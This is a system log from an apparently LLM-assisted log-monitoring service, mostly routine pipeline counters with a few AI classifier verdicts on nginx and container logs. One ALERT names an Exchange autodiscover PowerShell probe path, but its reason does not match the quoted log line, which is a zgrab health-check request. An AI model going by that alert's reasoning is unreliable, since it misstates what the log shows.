Mar 20 02:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:35:01.945817 [observer] Pipeline: processed=879 pattern_hits=863 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:35:01.945851 [observer] Patterns: hash=863 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:35:31.941976 [observer] Pipeline: processed=881 pattern_hits=865 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:35:31.942002 [observer] Patterns: hash=865 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:36:01.956112 [observer] Pipeline: processed=883 pattern_hits=867 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:36:01.956143 [observer] Patterns: hash=867 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:36:31.933581 [observer] Pipeline: processed=887 pattern_hits=871 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:36:31.933603 [observer] Patterns: hash=871 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:37:01.950598 [observer] Pipeline: processed=889 pattern_hits=873 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:37:01.950627 [observer] Patterns: hash=873 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:37:31.934608 [observer] Pipeline: processed=893 pattern_hits=877 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:37:31.934639 [observer] Patterns: hash=877 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:38:01.963308 [observer] Pipeline: processed=895 pattern_hits=879 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:38:01.963337 [observer] Patterns: hash=879 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:38:31.935286 [observer] Pipeline: processed=899 pattern_hits=883 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:38:31.935309 [observer] Patterns: hash=883 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:39:01.959202 [observer] Pipeline: processed=901 pattern_hits=885 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:39:01.959316 [observer] Patterns: hash=885 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:39:31.944594 [observer] Pipeline: processed=903 pattern_hits=887 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:39:31.944623 [observer] Patterns: hash=887 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:01.941078 [observer] Pipeline: processed=907 pattern_hits=891 llm_calls=16 llm_errors=0 learned=0
Mar 20 02:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:01.941112 [observer] Patterns: hash=891 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=16
Mar 20 02:40:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:25.993587 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 02:40:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:25.993627 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 02:40:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:30.654710 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 02:40:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:30.654747 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 02:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:31.936080 [observer] Pipeline: processed=913 pattern_hits=895 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:40:31.936108 [observer] Patterns: hash=895 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:41:01.943423 [observer] Pipeline: processed=917 pattern_hits=899 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:41:01.943452 [observer] Patterns: hash=899 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:41:31.935120 [observer] Pipeline: processed=919 pattern_hits=901 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:41:31.935149 [observer] Patterns: hash=901 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:02.162476 [observer] Pipeline: processed=923 pattern_hits=905 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:02.162522 [observer] Patterns: hash=905 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:31.941660 [observer] Pipeline: processed=925 pattern_hits=907 llm_calls=18 llm_errors=0 learned=0
Mar 20 02:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:31.941687 [observer] Patterns: hash=907 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=18
Mar 20 02:42:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:37.892709 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 02:42:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:37.892748 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 02:42:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:41.386260 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 02:42:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:42:41.386304 [analyzer] Source hint mismatch: LLM says "docker", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 02:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:43:01.962784 [observer] Pipeline: processed=933 pattern_hits=913 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:43:01.962813 [observer] Patterns: hash=913 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:43:31.933773 [observer] Pipeline: processed=939 pattern_hits=919 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:43:31.933794 [observer] Patterns: hash=919 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:44:01.958719 [observer] Pipeline: processed=941 pattern_hits=921 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:44:01.958757 [observer] Patterns: hash=921 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:44:31.934902 [observer] Pipeline: processed=945 pattern_hits=925 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:44:31.934930 [observer] Patterns: hash=925 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:45:01.943866 [observer] Pipeline: processed=947 pattern_hits=927 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:45:01.943893 [observer] Patterns: hash=927 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:45:31.934500 [observer] Pipeline: processed=953 pattern_hits=933 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:45:31.934529 [observer] Patterns: hash=933 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:01.954291 [observer] Pipeline: processed=955 pattern_hits=935 llm_calls=20 llm_errors=0 learned=0
Mar 20 02:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:01.954871 [observer] Patterns: hash=935 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=20
Mar 20 02:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:26.101356 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 02:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:26.101395 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An actuator health endpoint missing its file under nginx, resulting in a failed health check. This is an abnormal health endpoint failure and could indicate misconfiguration or deployment issues, warranting monitoring but not definitive malicious activity. Line=2026-03-20T02:46:21.612730653Z 2026/03/20 02:46:21 [error] 422#422: *744141 open() "/usr/share/nginx/default/actuator/health" failed (2: No such file or directory), client: 20.118.233.215, server: _, ...
Mar 20 02:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:26.101462 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T02:46:21.612753343Z 20.118.233.215 - - [20/Mar/2026:02:46:21 +0000] "54.200.221.0" "GET /actuator/health HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 02:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:31.939258 [observer] Pipeline: processed=959 pattern_hits=938 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:46:31.939289 [observer] Patterns: hash=938 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:47:01.945998 [observer] Pipeline: processed=963 pattern_hits=942 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:47:01.946024 [observer] Patterns: hash=942 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:47:31.937329 [observer] Pipeline: processed=965 pattern_hits=944 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:47:31.937353 [observer] Patterns: hash=944 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:48:01.954660 [observer] Pipeline: processed=969 pattern_hits=948 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:48:01.954715 [observer] Patterns: hash=948 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:48:31.943182 [observer] Pipeline: processed=971 pattern_hits=950 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:48:31.943210 [observer] Patterns: hash=950 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:49:01.943553 [observer] Pipeline: processed=975 pattern_hits=954 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:49:01.943692 [observer] Patterns: hash=954 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:49:31.942197 [observer] Pipeline: processed=977 pattern_hits=956 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:49:31.942221 [observer] Patterns: hash=956 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:50:01.959148 [observer] Pipeline: processed=979 pattern_hits=958 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:50:01.959209 [observer] Patterns: hash=958 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:50:31.934189 [observer] Pipeline: processed=985 pattern_hits=964 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:50:31.934215 [observer] Patterns: hash=964 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:51:01.953585 [observer] Pipeline: processed=987 pattern_hits=966 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:51:01.953610 [observer] Patterns: hash=966 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:51:31.934862 [observer] Pipeline: processed=991 pattern_hits=970 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:51:31.934890 [observer] Patterns: hash=970 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:52:01.949936 [observer] Pipeline: processed=993 pattern_hits=972 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:52:01.950045 [observer] Patterns: hash=972 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:52:31.934818 [observer] Pipeline: processed=997 pattern_hits=976 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:52:31.934850 [observer] Patterns: hash=976 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:53:01.952687 [observer] Pipeline: processed=999 pattern_hits=978 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:53:01.952796 [observer] Patterns: hash=978 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:53:31.943650 [observer] Pipeline: processed=1001 pattern_hits=980 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:53:31.943678 [observer] Patterns: hash=980 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:54:01.943554 [observer] Pipeline: processed=1005 pattern_hits=984 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:54:01.943584 [observer] Patterns: hash=984 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:54:31.933602 [observer] Pipeline: processed=1007 pattern_hits=986 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:54:31.933625 [observer] Patterns: hash=986 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:55:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:55:02.028884 [observer] Pipeline: processed=1011 pattern_hits=990 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:55:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:55:02.028919 [observer] Patterns: hash=990 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:55:31.933658 [observer] Pipeline: processed=1015 pattern_hits=994 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:55:31.933685 [observer] Patterns: hash=994 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:56:01.948693 [observer] Pipeline: processed=1019 pattern_hits=998 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:56:01.948723 [observer] Patterns: hash=998 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:56:31.934009 [observer] Pipeline: processed=1022 pattern_hits=1001 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:56:31.934033 [observer] Patterns: hash=1001 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:57:01.950822 [observer] Pipeline: processed=1024 pattern_hits=1003 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:57:01.950848 [observer] Patterns: hash=1003 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:57:31.934855 [observer] Pipeline: processed=1028 pattern_hits=1007 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:57:31.934887 [observer] Patterns: hash=1007 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:58:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:58:02.040116 [observer] Pipeline: processed=1030 pattern_hits=1009 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:58:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:58:02.040155 [observer] Patterns: hash=1009 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:58:31.934755 [observer] Pipeline: processed=1034 pattern_hits=1013 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:58:31.934780 [observer] Patterns: hash=1013 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:59:01.988274 [observer] Pipeline: processed=1036 pattern_hits=1015 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:59:01.988311 [observer] Patterns: hash=1015 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 02:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:59:31.933628 [observer] Pipeline: processed=1039 pattern_hits=1018 llm_calls=21 llm_errors=0 learned=0
Mar 20 02:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:59:31.933652 [observer] Patterns: hash=1018 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:00:01.943087 [observer] Pipeline: processed=1042 pattern_hits=1021 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:00:01.943114 [observer] Patterns: hash=1021 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:00:31.942515 [observer] Pipeline: processed=1046 pattern_hits=1025 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:00:31.942540 [observer] Patterns: hash=1025 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:01:01.939464 [observer] Pipeline: processed=1050 pattern_hits=1029 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:01:01.939498 [observer] Patterns: hash=1029 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:01:31.947058 [observer] Pipeline: processed=1052 pattern_hits=1031 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:01:31.947083 [observer] Patterns: hash=1031 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:02:01.942629 [observer] Pipeline: processed=1056 pattern_hits=1035 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:02:01.942869 [observer] Patterns: hash=1035 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:02:31.934671 [observer] Pipeline: processed=1058 pattern_hits=1037 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:02:31.934696 [observer] Patterns: hash=1037 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:03:01.953756 [observer] Pipeline: processed=1061 pattern_hits=1040 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:03:01.953787 [observer] Patterns: hash=1040 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:03:31.938589 [observer] Pipeline: processed=1064 pattern_hits=1043 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:03:31.938615 [observer] Patterns: hash=1043 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:04:01.952786 [observer] Pipeline: processed=1066 pattern_hits=1045 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:04:01.952817 [observer] Patterns: hash=1045 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:04:31.933787 [observer] Pipeline: processed=1070 pattern_hits=1049 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:04:31.933815 [observer] Patterns: hash=1049 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:05:01.939683 [observer] Pipeline: processed=1072 pattern_hits=1051 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:05:01.939711 [observer] Patterns: hash=1051 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:05:31.933656 [observer] Pipeline: processed=1078 pattern_hits=1057 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:05:31.933679 [observer] Patterns: hash=1057 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:06:01.944152 [observer] Pipeline: processed=1080 pattern_hits=1059 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:06:01.944203 [observer] Patterns: hash=1059 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:06:31.934724 [observer] Pipeline: processed=1083 pattern_hits=1062 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:06:31.934753 [observer] Patterns: hash=1062 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:07:01.969027 [observer] Pipeline: processed=1086 pattern_hits=1065 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:07:01.969054 [observer] Patterns: hash=1065 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:07:31.949842 [observer] Pipeline: processed=1088 pattern_hits=1067 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:07:31.949872 [observer] Patterns: hash=1067 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:08:01.947215 [observer] Pipeline: processed=1092 pattern_hits=1071 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:08:01.947244 [observer] Patterns: hash=1071 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:08:31.943224 [observer] Pipeline: processed=1094 pattern_hits=1073 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:08:31.943245 [observer] Patterns: hash=1073 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:09:01.940301 [observer] Pipeline: processed=1098 pattern_hits=1077 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:09:01.940330 [observer] Patterns: hash=1077 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:09:31.933698 [observer] Pipeline: processed=1100 pattern_hits=1079 llm_calls=21 llm_errors=0 learned=0
